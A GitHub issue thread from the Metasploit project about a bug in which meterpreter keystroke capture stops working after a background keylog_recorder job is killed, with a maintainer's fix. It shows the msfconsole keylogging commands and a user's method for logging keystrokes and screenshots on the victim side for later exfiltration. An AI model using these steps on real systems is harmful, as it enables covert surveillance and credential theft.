### ISSUE TITLE
keystroke sniffing stops working after killing background job which was previously sniffing

### ISSUE THREAD

**Issue by kayaker-msf** [rapid7/metasploit-framework#8608] opened 2017-06-25 14:44 UTC
If you start a background job (post module) to start sniffing keystrokes on remote windows machine and then kill it (and maybe with timeouts not really sure), I guess something is not cleaned up victim side (keystroke thread o timer maybe) because after that you can no longer capture keys in that session.
session keeps working ok but capture keys no longer capture anything no matter how many times you start or stop keyscan

tested with 
windows/x64/meterpreter/reverse_winhttps
windows/x64/meterpreter_reverse_tcp

## Steps to reproduce
run a keylog_recorder post module in the background and then after some time kill it.

use post/windows/capture/keylog_recorder
set SESSION xxx
set MIGRATE true

msf post(keylog_recorder) > run -j
[*] Post module running as background job
msf post(keylog_recorder) >
[*] Executing module against xxxx
[*] Trying explorer.exe (yyy)
[+] Successfully migrated to Explorer.EXE (yyyy) as: xxxxx
[*] Starting the keylog recorder...
[*] Keystrokes being saved in to xxxxx
[*] Recording keystrokes...

msf post(keylog_recorder) > jobs

  Id  Name                                   
  --  ----                                   
  2   Post: windows/capture/keylog_recorder

- Everything working fine  

msf post(keylog_recorder) > kill 2
[*] Stopping the following job(s): 2
[*] Stopping job 2

[*][*] Shutting down keylog recorder. Please wait...
 Shutting down keylog recorder. Please wait...
msf post(keylog_recorder) >

- now keylogging in that session becomes useless

- change to that session

meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes...

- nothing 

### Metasploit version
> version
Framework: 4.15.0-dev-6a8d54a93c751c19b85a799f601022530969f222
Console  : 4.15.0-dev-6a8d54a93c751c19b85a799f601022530969f222

### I installed Metasploit with:
windows installer
metasploit-framework-4.15.0+20170625092412-1rapid7-1-x86.msi

### What OS are you running Metasploit on?
Windows

**Comment by wwebb-r7** [comment] 2017-06-26 20:28
Do you happen to know if it worked as of last week?

I think I may know what the issue is if recent changes are to blame.  Looking into it.

**Comment by kayaker-msf** [comment] 2017-06-26 21:10
No 100% sure, but I don't think it's a really recent issue (as a week at least).
I was having similar problems with a releast at least a moth ago, but didn't take the time to troubleshoot it, just spawn another session and capture keys in that one.
My guess is this problem is older.

**Comment by wwebb-r7** [comment] 2017-06-26 21:20
Alright thanks, after skimming I have a better idea of what the problem might be, and it may just be 1996 kind of old.    I'll update when it's fixed.

**Comment by kayaker-msf** [comment] 2017-06-29 22:54
Another thing, possibly related.
I have a sligthly custom keylog grabber post module, it sets the respose_time out longer than the default

session.response_timeout = 24 * 3600 

so the background job has 24 hs before time out (default is 10minutes or so) and keeps waiting for session to come back alive again ( reverse_https works great )
For example after suspending victim at 17hs and resuming next day at 08 hs for example, sometimes keylogging keeps working and sometimes does not (always considering sessions that come back alive ok of course)

**Comment by wwebb-r7** [comment] 2017-07-07 01:10
It turns out that it wasn't a pure threading issue, but more so the fact that it's a message-only window created from a dynamically loaded DLL.  It's working on my end now.  If you have a great need to fix it now, you can build the code from https://github.com/rapid7/metasploit-payloads/pull/213 and try it out (I can give very sparse advice here and there on building but you'd be practically on your own).  Otherwise, it should be merged relatively soon.

**Comment by kayaker-msf** [comment] 2017-07-20 00:20
Good, Thanks a lot !
I'll try it out as soon is merged and released.

Anyway I kind of gave up to keylogging and screengrabbing "server side", even if you set longer timeouts it's too problematic and of course you lose all the time the victim is not connected.
I've switched to powershell extension and keyloggin and screengrabbing "victim side" with powershell to a temp location and periodically download all that data to metasploit/attacker side as soon as there is connection.
It works great that way.

**Comment by wwebb-r7** [comment] 2017-07-20 15:24
How would you like both keylogging and screen captures to work?  Or what features would you most like to see?  I currently have some projects going on with regards to screengrabs and video capture.  Some other people have some going on with the goal of making payloads more asynchronous.  I can't say we'll tailor it to your personal needs, but they can certainly go for consideration on the wish list.

**Comment by kayaker-msf** [comment] 2017-07-21 01:50
I suppose the most needed improvement is to work standalone victim side (writing locally) and when session is reconnected or reestablished then transfer data matasploit side.

I currently have that working, but in a complete hackish ghetto way, loading powershell extension and I have adapted 2 Powersploit exfiltration commands

Get-Keystrokes.ps1
Get-TimedScreenshot.ps1

both adapted to save locally (a screenshot every say 10 seconds configurable) and using BeginInvoke to run async (and not using PS jobs because they spawn another process, I prefer BeginInvoke so as to stay in process )
and then a stupid post module wich sleeps and moves data when session gets connected.
Powershell advantages are it's far easier to expand and tweak (for example I added multiple monitors to screen grabbing easily) than espia c code I could never undestand or edit.

**Comment by wwebb-r7** [comment] 2017-07-21 03:05
It isn't ready for release, but I have a working PoC extension that solves the multiple monitor/scaling/rotation issues that each screen capture implementation in Meterpreter has (I think there are two or three that all do the same thing, for whatever reason ...).  It's Windows 8+ only at the moment though I believe 7 can be made to work.  I have no plans to support anything before that.  No promises, but I don't believe it's in the very distant future with regards to release.

As far as doing pretty much anything asynchronously with no active connection, that's something that is being worked on; however, I'm not going to begin to guess when you might expect capabilities like that.

The keyscan changes were merged, so I'm going to close this issue.  If you have anymore feature requests, ideas, etc, feel free to file another one.  Thanks

**Closed by wwebb-r7** 2017-07-21 03:05 UTC
